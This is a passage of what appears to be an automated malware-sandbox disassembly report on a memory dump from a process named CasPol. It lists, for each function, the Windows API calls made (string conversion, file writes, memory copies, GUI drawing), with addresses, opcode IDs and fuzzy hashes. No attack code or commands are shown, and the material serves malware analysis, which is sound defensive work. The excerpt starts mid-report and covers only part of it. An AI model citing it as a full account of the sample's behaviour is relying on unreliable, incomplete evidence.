                                                                                                                                                                          • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 0040F673
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                          • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2754987064-0
                                                                                                                                                                          • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                          • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                          • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                          • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                                          • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2754987064-0
                                                                                                                                                                          • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                          • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                          • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                          • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                            • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                            • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                          • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 764393265-0
                                                                                                                                                                          • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                          • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                          • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                          • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                          APIs
                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 979780441-0
                                                                                                                                                                          • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                          • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                          • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                          • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                          APIs
                                                                                                                                                                          • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                                          • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                          • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1386444988-0
                                                                                                                                                                          • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                          • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                          • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                          • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                                          APIs
                                                                                                                                                                          • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                          • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                            • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: wcschr$memcpywcslen
                                                                                                                                                                          • String ID: "
                                                                                                                                                                          • API String ID: 1983396471-123907689
                                                                                                                                                                          • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                          • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                          • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                          • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                          APIs
                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _snwprintfmemcpy
                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                          • API String ID: 2789212964-323797159
                                                                                                                                                                          • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                          • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                          • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                          • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 0040E770
                                                                                                                                                                          • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSendmemset
                                                                                                                                                                          • String ID: F^@
                                                                                                                                                                          • API String ID: 568519121-3652327722
                                                                                                                                                                          • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                          • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                          • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                          • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                          APIs
                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ??3@DeleteObject
                                                                                                                                                                          • String ID: r!A
                                                                                                                                                                          • API String ID: 1103273653-628097481
                                                                                                                                                                          • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                          • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                          • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                          • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                          APIs
                                                                                                                                                                          • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                          • free.MSVCRT ref: 0040B201
                                                                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                          • free.MSVCRT ref: 0040B224
                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 726966127-0
                                                                                                                                                                          • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                                                          • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                          • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                                                          • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                          APIs
                                                                                                                                                                          • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                          • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                          • free.MSVCRT ref: 0040B12C
                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3669619086-0
                                                                                                                                                                          • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                                                          • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                          • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                                                          • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                          • malloc.MSVCRT ref: 00417407
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                          • free.MSVCRT ref: 00417425
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2605342592-0
                                                                                                                                                                          • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                                                                          • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                          • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                                                                          • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5